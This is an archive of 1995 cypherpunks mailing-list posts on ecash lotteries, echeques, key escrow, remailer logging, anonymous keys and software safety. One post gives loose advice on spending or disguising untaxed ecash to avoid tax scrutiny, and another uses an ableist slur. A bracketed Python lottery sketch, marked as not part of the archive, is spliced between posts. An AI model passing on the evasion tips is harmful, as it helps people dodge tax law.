Date: Fri, 1 Dec 1995 12:10:49 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <01HY9QKW4BCS8WYZVM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"s1113645@tesla.cc.uottawa.ca" 30-NOV-1995 00:22:29.15

Isn't there also some Scandinavian bank that's handling ecash? It might be
hard to explain to US tax authorities how large amounts of anon currency
are ending up in one's marktwain account. In that case it might be 
-------------------
	There are essentially two things that one can do with tax-suspicious
ecash (or cash, for that matter). The first is to expend it in non-traceable,
non-predictable ways. The second is to disguise it so it looks
non-tax-suspicious.
	The first includes spending, of course. In regards to the
non-predictable, I am meaning avoiding spending it for things such as groceries
that someone can easily estimate a minimum bound for how much can be spent.
Spending it to add quality (such as low-fat foods) to those groceries would be
harder to prove.
	The first also includes charity and investment. Investment does have
the problem that the income one gets out will have to then be treated by the
same sort of process.
	The second will vary in method depending on one's individual skills
and situation. However, I will note that it will be easier for those with
independent earning skills- a self-owned business, for instance.
	I will note in regards to the above that while I have been doing some
reading on the underground/black economy, I have not actually attempted any
of the maneuvers discussed. Thus, what I say should be taken with at least a
grain of salt.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 30 Nov 1995 19:37:34 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <ace2b2de0c021004c90a@[205.199.118.202]>
Message-ID: <199511301122.WAA23954@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and tcmay@got.net (Timothy C. May)

tcmay wrote:
> At 6:22 AM 11/30/95, Bill Frantz wrote:
> >At 20:38 11/29/95 -0800, Timothy C. May wrote:
> >>Have to be _very_ careful here. A variety of scams can be developed which
> >>show lots of "small" winners, but which fail to show any large winners. The
...
> My intuition (hand-waving) is that an anonymous lottery is possible, but I
> haven't looked at the details. Certainly multiple trusted holders of keys
...

I've read somewhere that it's possible to play poker over the telephone;
see comp.risks 17.19 and 17.21 (particularly the latter, though I haven't
followed the references so I can't speak of them).

...
> (escrow agents) would help make the lottery fair. Maybe bit commitment
> would help (each player buys the right to play, then "commits" his number.
...

How about every person commits a random number, then all reveal.
The winner is determined deterministically from all the numbers.

Does this make sense or is there some basic hole in it?

(
I have a tendency to be too brief to be comprehensible, so let me
rephrase it somewhat longer:

1. game is announced, players registered and numbered [1]..[n]
2. each player [i] chooses a random number [a_i] (secretly)
3. each player [i] publicly commits to [a_i]
4. wait for all players to commit
5. each player [i] publishes [a_i]
6. the winner is player [f(a_1,a_2,...,a_n)]

The function f doesn't need to be one way, but the output must depend on
all the inputs. (Sum modulo n sounds OK but I haven't thought it out.)
)

The fun bit in this game would be picking your number - of course
that reduces security, but I suspect that many people would prefer
to type in their lucky numbers themselves than having a computer
pick it for them... Or you could get the entropy from the mouse:
"it's all in the wrist".

You could probably almost code that in a shell script...


Obvious weakness is that the last player to do step 5 above knows
who the winner is before anyone else, and could presumably disappear.
The way to avoid this is a rule that when a player disappears the
money goes to charity. (A malicious last player could still prevent
you from winning, but at least without payoff. You could give it
negative payoff if you wanted.) If you wish to discuss this point,
Cc me at jiri@c031.aone.net.au - that's where my spreadsheet is.


Have I just made a complete fool of myself?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBML2T0yxV6mvvBgf5AQEtGQP/VKUGrArDxG98iIiAtQ0zuErSjCsMJN+P
HJ8MROmbgPa5kstzLMRk6wjPSkxSuUtiLLVbTTV6Aghfi2Kh7mRa6D38j43hyImU
Z0V6V7gtCis/QzZ7KSTt5KKkDev672bbL17XYVWhMfvLABUG7L7kCbbKDGjUgUrL
yl4H+8Pxt1c=
=2nuk
-----END PGP SIGNATURE-----
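
[Added example, not part of the post above or of the list archive: a Python sketch of the six-step commit-then-reveal draw Jiri describes, with his "sum modulo n" as f and his rule that a missing reveal sends the pot to charity. The hash commitment (SHA-256 over player number, a random 32-byte nonce and the value) and all function names are assumptions made here; the post only says "commits".]

```python
import hashlib
import hmac
import secrets

VALUE_BYTES = 32  # numbers a_i are taken from [0, 2**256)


def commit(player: int, value: int, nonce: bytes) -> str:
    """Step 3: commitment = SHA-256(player || nonce || value), fixed-width fields.

    The nonce hides small "lucky numbers" that could otherwise be guessed by
    hashing every candidate; the player number stops one player from copying
    another's commitment and later replaying that player's reveal.
    """
    if not 0 <= value < 2 ** (8 * VALUE_BYTES):
        raise ValueError("value out of range")
    if len(nonce) != 32:
        raise ValueError("nonce must be 32 bytes")
    data = player.to_bytes(4, "big") + nonce + value.to_bytes(VALUE_BYTES, "big")
    return hashlib.sha256(data).hexdigest()


def new_entry(player: int, value=None):
    """Step 2: choose a secret number (random unless the player types one in)."""
    if value is None:
        value = secrets.randbelow(2 ** (8 * VALUE_BYTES))
    nonce = secrets.token_bytes(32)
    return value, nonce, commit(player, value, nonce)


def reveal_ok(player: int, commitment: str, value: int, nonce: bytes) -> bool:
    """Step 5 check: does the published (value, nonce) open the commitment?"""
    try:
        expected = commit(player, value, nonce)
    except ValueError:
        return False
    return hmac.compare_digest(expected, commitment)


def draw(commitments: dict, reveals: dict):
    """Step 6: return (winner, defaulters).

    commitments maps player number (1..n) to the hex commitment published in
    step 3; reveals maps player number to the (value, nonce) published in
    step 5. If any player is missing or opens the commitment incorrectly,
    winner is None (the pot goes to charity) and defaulters lists who failed.
    """
    players = sorted(commitments)
    n = len(players)
    if players != list(range(1, n + 1)):
        raise ValueError("players must be numbered 1..n")
    defaulters = [
        p for p in players
        if p not in reveals or not reveal_ok(p, commitments[p], *reveals[p])
    ]
    if defaulters:
        return None, defaulters
    # f(a_1..a_n) = (sum mod n) + 1: every input can change the result, and one
    # honest uniformly random a_i is enough to make the winner uniform.
    total = sum(reveals[p][0] for p in players)
    return total % n + 1, []


if __name__ == "__main__":
    # Constructed sample game with three players.
    entries = {p: new_entry(p) for p in (1, 2, 3)}
    published = {p: e[2] for p, e in entries.items()}
    opened = {p: (e[0], e[1]) for p, e in entries.items()}
    print("all reveal:      ", draw(published, opened))
    del opened[3]  # the last player sees the others' numbers and vanishes
    print("player 3 vanishes:", draw(published, opened))
```

[The second call shows the weakness named in the post: the last revealer can still block a result, but cannot change the number already committed.]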




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 1 Dec 1995 12:52:47 +0800
To: cypherpunks@toad.com
Subject: (fwd) ECheques
Message-ID: <v02120d4cace424453e03@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date:  Thu, 30 Nov 1995 17:11:34 PM PST
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: ECheques

We have just had the final modifications of the documentation from our
Lawyers to make the UK Sterling Clearing ECheque system fully live.

If you want to peruse the process

http://mkn.co.uk/bank - about opening accounts
http://mkn.co.uk/help/bank/register - account contract
http://mkn.co.uk/help/bank/regkey - registering each key mandate

We do intend putting some form of PGP signature checking facility
in for clearing ECheques later, but for the moment the standard ECheque
form generated by WorkHorse is what we accept.

The Standard ECheque is nothing more than a BER encoded sequence
similar to a certificate request with a standard PKCS signature at the end
of it which is then Base64 encoded (but if you use the decoding
facilities in WorkHorse you can see this).

Britain .... first again.

We did clear an ECheque in September, but this is now the real McCoy.
Merchant accounts cost nothing to open and the transactional charge
for a Merchant to receive Sterling (not ecash denominated in Sterling)
is 1%.  The accounts can be reviewed online and they are real bank
accounts (in Sterling however).  Other Merchant transactions are costed
as usual see conditions (eg 40p per cheque - paper cheque).

If you want to integrate ECheques and the web simply see our flower
ordering form http://mkn.co.uk/load/ordflow

John
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 1 Dec 1995 12:29:13 +0800
To: loki@obscura.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <01HY9R3NKBII8WYZVM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@obscura.com" 30-NOV-1995 21:12:15.86

If he has not clarified his position by tomorrow evening, I will set up some
web pages explaining the situation and decrying Netscape's apparent
position on key escrow (GAK). I have the quotes that L. McCarthy posted,
and Jeff Weinstein's response. I have not been able to get the article off
the server yet (possible all the cypherpunks downloading it?). Any other
documents I should include?
---------
	I would suggest being sure to include some links to the EFF archives
in regards to Clipper, etcetera. These should make it clear that it isn't just
one group opposing the idea of GAK, but a wide coalition.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 1 Dec 1995 15:27:54 +0800
To: adam@lighthouse.homeport.org
Subject: Re: Medical Records
Message-ID: <01HY9R839B8G8WYZVM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"adam@homeport.org"  "Adam Shostack" 29-NOV-1995 14:05:58.31

	It seems that they use signatures & hashes; nice work, a good
advance for medical records storage, but I'd ask how keys are managed,
and also what prevents me exploiting the 'hash-only' mode of sending
in what I'm claiming to be is an emergency.  (Not that these
invalidate the system; they're just interesting areas to work on.)
----------------------
	Good questions. I would encourage anyone in San Francisco to go by
and talk to them (or, of course, if anyone can find the researcher's email
address, that would be excellent).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KJC@cityscape.co.uk (KJC)
Date: Fri, 1 Dec 1995 07:34:38 +0800
To: cypherpunks@toad.com
Subject: Re: GAKzilla & British MPs
Message-ID: <199511302239.WAA16631@ns.cityscape.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>On Thu, 30 Nov 1995, KJC wrote:
>
>> for ages - I give up!.- BTW- after 'Britland' MPs posted here a while back
>
>Interesting, that must have been during one of my sanity vacations from the 
>list. Do you remember approx. when or maybe what their names were?
>Might make it easier to hunt it down in the archives.
>Thanks.
>
>You know it's really strange, the only people around here I've found 
>interested in crypto and aware of sci.crypt and this list were government 
>spooks. I even sold my 1st edition Applied Crypto to one.
>Friendly people, but totally discouraging.
>
>> I thought _maybe_ we'd hear more.Will the last one to leave Grate Britain
>> please switch out the lights!
>> kc
>At least you have better weather. 
>
>
I think it was around March '95. Adam Back(?) cross-posted an email
from sci.crypt (written by Chris Smith and concerning Cambridge(U.K.)
MP Anne Campbell). At some point Campbell posted to the list herself(?)
Sorry, I'm not very clear on this but for some reason I always thought
she wasn't the only MP involved. Yadayadayada... they're a bit like London buses-
nothing for hours then 3 or 4 arrive at the same time...
I've posted this to the list 'cause maybe someone can update the story...
I'd _still_ like to know if there has been any discussion(by MPs) since then 
Sorry about the bandwidth 
kc
p.s. Weather better now it's been sold to the French.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Dec 1995 00:25:10 +0800
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <2.2b7.32.19951201064716.008989b0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 11/30/95 -0500, you wrote:

>To use the most obvious example, different remailer operators turn
>different levels of logging on.  So one operator will say "Yes, I am
>obligated to fully comply with your subpoena, officer.  Here are the
>full logs for the last six months."  And another will say "Yes, I am
>obligated to fully comply with your subpoena, officer.  However, I
>keep no logs at all of the mail sent through my remailer.  Drag, huh?"

Sounds like we need a version of Mixmaster for the logs...

| Its Log! Its Log! Its big, its heavy, its erased| alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 30 Nov 1995 20:05:57 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: key for Alice as promised (not)
In-Reply-To: <m0tKuh9-0008zjC@pacifier.com>
Message-ID: <199511301156.WAA24082@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Jon Lasser <jlasser@rwd.goucher.edu>
  and jimbell@pacifier.com (jim bell)
  and cypherpunks@toad.com

jim bell wrote:
> >On Tue, 28 Nov 1995, Adam Hupp wrote:
...

One reason why Alice might not want to use PGP would be that possession
of the secret key would be ipso facto evidence that he is Alice.

...
> spoofed, HE WILL KNOW because he will see a message with his signature that
> HE KNOWS he didn't send.  At that point, he will at least be able to reduce
> the number of spoofed messages to 1 before he alerts us that there is a
> problem.  We won't necessarily know who to believe, of course, but we will
...

Who to believe: at that stage, Alice will simply cease to exist.
The key will be revoked and Alice will be no more. A new Alice may
or may not arise, but no-one will know if it's the same one.

If Alice is afraid of loss of identity (as if he had one now),
he could have a permanent key at home (where he does his OTP work),
and on his e-mail machine have only a temporary key. When the key
on the public machine is compromised, it is revoked and a new one
is issued.

(The same can be done with real-name keys, BTW; viz my own key.)

...
> 3.  Somebody found out how to break 1024-bit PGP keys easily.  (Very
> unlikely, of course.)
...

In this case I think we are all stuffed.


Adiau'

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBML2cAyxV6mvvBgf5AQFU7wP/ap/HA2SzMfRoM+5Rihw+j9RHC7aZNCtq
ZcUbXJRVXA2iDZfTE/vd5NgYDxEflyb9FwcGd8MZ8s0pxmee/iqEx3YXI0M2b7gL
HOex526hifweAQmaPoSQLWqiN4XVZ51XVBvKOJos/9eOX9FAZDRQZd6KFBaSqIcc
ZpzQ54NLm0g=
=BLPi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmhayes@netcom.com (Jordan Hayes)
Date: Sun, 3 Dec 1995 00:23:33 +0800
To: cypherpunks@toad.com
Subject: A challenge ...
Message-ID: <199512010735.XAA04851@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been challenged to try to find a bank account; I win the challenge
if I can wire in $100 to the hidden account.  Anyone have any good
ideas about how to find an ABA number?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 1 Dec 1995 07:43:30 +0800
To: iang@cs.berkeley.edu
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300621.WAA26406@netcom14.netcom.com>
Message-ID: <9511302253.AA04389@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


'small' questions about inet gambling

+ How do you complain that you didn't get your win without revealing
your ID ?
+ Alternatively, How do you prevent false complaints or nasty
concurrent trying to trash gambling co reputation ?

regards
ps: it would be easier that the game is legal so ppl can play without
being hidden... In my current casino, most people do complain when
there is a problem, and I think that those who don't aren't because
it's monopoly money or just they aren't paying much attention...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

jihad Ortega Qaddafi Legion of Doom South Africa KGB Uzi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 08:13:13 +0800
To: cypherpunks@toad.com
Subject: nonetest
Message-ID: <199511302254.XAA09438@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


12890 87221 56907 00458 94225
40838 75693 98239 87802 85834
98347 49857 21349 12038 14896
09343 87458 98589 32759 74545







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Giulio" <gexing@mbox.vol.it>
Date: Wed, 20 Nov 1996 14:19:57 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199611202219.OAA21780@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Unsuscribe Cypherpunks Giulio <gexing@mbox.vol.it>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 31 Oct 95 18:35:18 PST
To: cypherpunks@toad.com
Subject: "Dr." Fred
Message-ID: <199511010235.DAA00908@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The most charitable explanation for "Dr." Fred is that
he's degenerated into the professional equivalent of
those pathetic aging former chess masters who try to
eke out a subsistence living by charging five bucks a
game. People often play with them out of sympathy, or
for the novelty of having lost to a past great. It's
part of the chess culture, and it's basically harmless
and sort of quaint.

The difference, of course, is that it's almost impossible
to have sympathy for Dr. Fred. His hustle is for a hell
of a lot more than subsistence. He was also never actually
a master of his field, a fact that becomes increasingly
obvious as our exposure to him goes on. Now he's reduced
himself to trying to collect someone else's winnings.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 95 08:51:42 PST
To: cypherpunks@toad.com
Subject: Re: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <199511011651.LAA02027@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain




Mr. Anonymous:
Why is this being sent to cypherpunks? It's totally irrelevant.

.pm

Anonymous writes:
> The Wall Street Journal, October 31, 1995, p. B6. 
> 
> 
> IBM Announces New Software Code That Is Universal
> 
> By Laurie Hays
> 
> 
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.
> 
> For software developers and businesses that want to develop
> one set of codes to run applications on many different
> machines, Microkernal offers an opportunity for the
> long-touted open computing. A big challenge remains, however:
> to market the technology and make a business case for software
> developers to write for Microkernal in a world that is
> dominated by Intel Corp. and Microsoft Corp.
> 
> "It's exciting technology, but it will be hard for them to
> market," says Dan Kuznetsky, an analyst with International
> Data Corp., a Framingham, Mass., market-research firm. "It's
> also got a long way to go from what they've announced to the
> future."
> 
> Mr. Kuznetsky likens the technology to the development of a
> great automobile transmission that has yet to be turned into
> a truck or a car.
> 
> The key to Microkernal is a single source code base that
> communicates between the hardware and the operating system.
> One long-term possibility, for example, would be to make the
> Apple Computer Inc.'s Macintosh operating system work on an
> Intel PC, impossible today because the two have different
> design architectures that don't talk to each other.
> 
> IBM's delayed OS/2 operating system for the PowerPC chip,
> which is expected to be shipped by the end of the year, will
> be the first IBM offering for the Microkernal allowing
> developers to move applications to the chip with only small
> changes.
> 
> IBM so far has garnered a number of licensing agreements for
> Microkernal, including Digital Equipment Corp., Maynard,
> Mass., and LG Electronics, formerly the Korean electronics
> concern Goldstar, as well as a number of universities.
> 
> -----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ncra@ix.netcom.com (NCRA )
Date: Wed, 1 Nov 95 13:31:34 PST
To: cypherpunks@toad.com
Subject: SCO Unix Crontab Problems-Need Help
Message-ID: <199511012132.NAA20695@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I have a bourne shell that I need to execute in SCO unix 4.0 from a 
crontab.  The script is a communications upload using ecu.  The script 
runs just fine in terminal mode, but when it is executed in cron, it is 
not able to gain access of the modem for some reason.  

Q:  Is there something special that needs to be added to the crontab 
line in order to allow for tty access.  

Please let me know if you have any suggestions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Wed, 1 Nov 95 05:31:17 PST
To: hfinney@shell.portal.com
Subject: RE: (cpx) Digicash tagged with payee?
Message-ID: <95Nov1.143001gmt+0100.53766@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




Hal Finney <hfinney@shell.portal.com> writes:

>I have heard it claimed that when you make a payment with Digicash ecash,
>the identity of the payee is encoded or embedded into the cash somehow.
>This is an anti-theft measure (among other things, perhaps).  The bank
>checks that the embedded identity in deposited cash matches the account
>name which is doing the deposit.

Where have you heard that? Everything I've heard from DigiCash seems
to indicate that no such "payee encoding" is performed.

>My question is, how could this be done?  How can the payor, at payment
>time, without communicating with the bank, embed a payee name
>irreversibly into the cash so that a thief cannot strip it out and
>replace it with his own name?

It is possible though with other (theoretical) protocols, such as Chaum,
Fiat and Naor's off-line cash scheme (briefly described in Schneier's
book 'Applied Cryptography') and especially the (off-line) cash system,
developed by Stefan Brands.

In these systems, when Alice spends a coin at Bob's shop she has to
respond to a random challenge, sent to her by Bob. This random challenge
could possibly be a hash of Bob's identity and some other values.
My impression though is that this is not a feature of the current
implementation of ecash.

>Off-list there has been some discussion about the role of certificates in
>ecash, and in cash systems in general.  It would be interesting to know
>if this anti-theft provision of Digicash is actually provided by means of
>a certificate.

It is conceivable to think of the above mentioned methods in that way,  yes

/Lars Johansson
ljo@ausys.se





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 6 Nov 95 17:22:44 PST
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc3f0380a02100406fd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[Please don't copy Eugene Volokh <VOLOKH@law.ucla.edu> on your follow-ups;
I copied him on my original because I had quoted him.]

At 10:04 PM 11/6/95, s1113645@tesla.cc.uottawa.ca wrote:

>Judging by the amount of posting you do here, I was surprised that I only
>got 36 listings on your new address (1/3 of which quoted you but not
>directly written by you). Either you post more to alt, soc and talk (which
>they
>don't have) or you use a third address (the second thing I tried was
>tcmay@netcom.com, even less, though the archive's pretty recent, so that's
>expected).

I do little posting these days on Usenet. There is almost no sense of
"community" there, in the sense of persistent, memorable posters, and in
the sense of even _slightly_ having similar goals and aspirations. A vast
number of the posts on any topic come from people who just rolled off the
turnip truck and who have no interest in learning.

>I figured I'd send this to you as a private note, but then I figured
>this thing really is scary and has a lot to do with anonymity.
>Watch out folks. Little Brother is saving everything you've ever said on
>usenet. Your old posts just won't go away.

I've assumed this for many years. One used to be able to buy "Usenet on
CD-ROM"...before the volume got to be too high. I've always assumed that
archives would be increasingly available, eventually covering the entire
history of Usenet, going back to the early 80s, and with tools for tracking
the changes in login names over time (so that, for example, Perry's 1984
postings could be easily retrieved).

Dossier services are coming, of course. If not legal to operate in the
U.S., trivial to locate offshore. ("Employers, we will provide a scan of
prospective employers. We can let you know if potential employees have ever
posted to alt.drugs, alt.homosexual, alt.deviancy, or alt.cypherpunks.
Avoid needless risks.")


>(Not that someone who is so open in his views and true name as yourself
>would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived
>yet. It's bad enough they have rec.)

Huh? What makes you think "alt" is not archived? Just because DejaNews
doesn't index it doesn't mean it isn't archived in various places.

Paul Robichaux pointed me to another searcher, http://www.excite.com/,
which _does_ index the alt groups. I'm sure more are coming, reaching
further and further back in time. (At the rate the Net has been expanding,
by the time they can archive-and-index the last year of Usenet, they can
get the entire history for not much more. I'll bet this happens by the end
of 1997.)


>Ps. I will of course run searches on every other address that the who
>command on majordomo@toad.com supplies me with, so watch what you say
>ladies, gents and otherwise. ;->
>Get those 'nyms ready.

I offered the "Blacknet Dossier Service" a couple of years ago to the
Extropians list subscribers. Nick Szabo helped me out by claiming to the
list that he had purchased his dossier contents, and was "shocked" by what
he found. A number of the Extropian list subscribers were quite perturbed
before I told them it was a joke. Then I pointed out to them that there is
absolutely nothing which stops such things.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 95 18:20:48 PST
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511070208.VAA14762@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> : I understand that you are a lawyer and I'm not, but it is my
> : understanding that international treaties come in to play on this sort
> : of thing. For instance, in international shipments, you can transship
> : items and substances that are illegal to possess in a country through
> : its ports provided that the materials do not originate or terminate
> : their shipment in the country and remain sealed in their containers
> : throughout. It is also my understanding that items like mail and phone
> : calls that happen to transit a country are not necessarily subject to
> : that nation's laws provided that the nation is not a terminal point for
> : the mail or call or what have you.
> 
> The trouble is that the ITAR's definition of export that is relevant
> to cryptographic software has nothing to do with exporting in the
> normal sense, and therefore it has nothing to do with transshipments.

I am starting to have trouble believing you are a lawyer. Are you
actually telling me that treaties which explicitly indemnify
transshipment customers against local laws are superseded by lower
level laws, in spite of the supremacy clause of the constitution? That
might be what the state department would tell you, but I'd have
trouble believing even a lobotomized mongoloid judge would let that
stand. Treaties are treaties, period.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 7 Nov 95 01:47:51 PST
To: cypherpunks@toad.com
Subject: Re: [noise, personal reply] CBC address.
Message-ID: <199511070946.BAA06926@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


A post from Alice, that might be worth reading twice ...


On Sun, 5 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> 
> On Sat, 4 Nov 1995 anonymous-remailer@shell.portal.com wrote:
> 
> > Does anyone on this list know if the CBC has a web site on the Net?
> <www.cbc.ca>  They have a lot of shows in .au (so I hear) or accessible by 
> realaudio. Don't know if they have any mpigs [sic] though. There's an alt 
> newsgroup too.

Uhhm, thanks ... I guess ... but I wasn't _really_ looking for the 
CBC web site.

I was actually looking for someone to HOST a website which might 
showcase one particular program from the CBC, a program broadcast
in Canada which highlighted how AECL (Atomic Energy of Canada, Limited)
fails to practice safe computing and then when confronted, implements
a calculated program of strategic misrepresentation.  (i.e.  they lie.)

I thought that someone who strongly felt that error-free protocols and
error-free methods were important -- especially in mission critical
applications like medicine, commerce, or nuclear power plants -- might
possibly contact the CBC, and either voluntarily donate some bandwidth
and a host site, or conversely build a site devoted to showcasing the
human tragedy that can follow in the wake of shoddily designed
software.

I mean, good grief, we have Atomic Energy of Canada taking a cavalier
attitude towards computer code.  Not only is AECL involved in nuclear
medicine, in building wonderful radiological tools to help cancer
patients (theoretically) live, but they BUILD nuclear reactors worldwide.  

The CBC broadcast documented how this international firm REACTS to
reports of computer software errors.  It documents how the firm reacts
to reports of people dying because of sloppily written computer code.

The program is NOT (unfortunately) on the www.cbc.ca website, but
should be placed on the net and made available.  I'm not sure how
that was misunderstood.

But your next statement helped make it clear.

> You oughta use Sameer's (or someone else's) replyable remailer when asking 
> questions Alice.

I wasn't really asking for an answer, my Ottawa friend.  I really wasn't
looking for _another_ email in my mailbox to answer and address in my
copious spare time.  I was looking for some assistance. 

No direct reply was necessary.  

Someone could simply announce that they were volunteering to quarterback
bringing a host website online, and dealing with all the issues that are
involved with that (including liaising with the CBC.)

I'm not *quite* sure how you misread what I was hoping to achieve.

If however, you were looking to convince me to post from a remailer
that allows replies ... one that might let you send me known plain text
back through it ... something traceable back to me ... then I *might*
really understand, and I might beg off for a bit. 

Bit premature, and such ...

I think I'll pass on _that_ offer, especially since I really wasn't
looking for a personal private reply to what I wrote. 

Maybe, if I requote myself, it will be a little clearer all around.

(That's, strike two, btw ... to my Ottawa friend.)


Here's what I wrote:

> I know that it is rude to follow up one of your own posts, and I
> apologize in advance for this horrible faux-pas, but hopefully, it's
> excused this one time.  I wrote:
>
>
> >One example of this that should serve as a useful case study is a recent 
> >problem which was brought to the Canadian public's attention just this 
> >week, on a program called the Fifth Estate.  The CBC (Canadian 
> >Broadcasting Corporation) detailed a software code problem in one of 
> >AECL's (Atomic Energy of Canada Limited's) instruments which deliver 
> >penetrating radiation.  
> >
> >The software which controlled the radiation dose, would periodically 
> >override the oncologist's calibration and deliver a radiation dose 100 
> >times what was prescribed.  This software "bug" literally killed wherever 
> >the machine was in use.
>
> Does anyone on this list know if the CBC has a web site on the Net?
>
> I'm hoping that someone (hint, hint) who has a convenient website, one
> with lots of spare bandwidth could volunteer to contact the CBC and
> persuade them to copyright clear the Fifth Estate program clip which
> documented some of the risks of software bugs in mission critical
> applications, and allow it to be placed on the Net.  I'm hoping that this
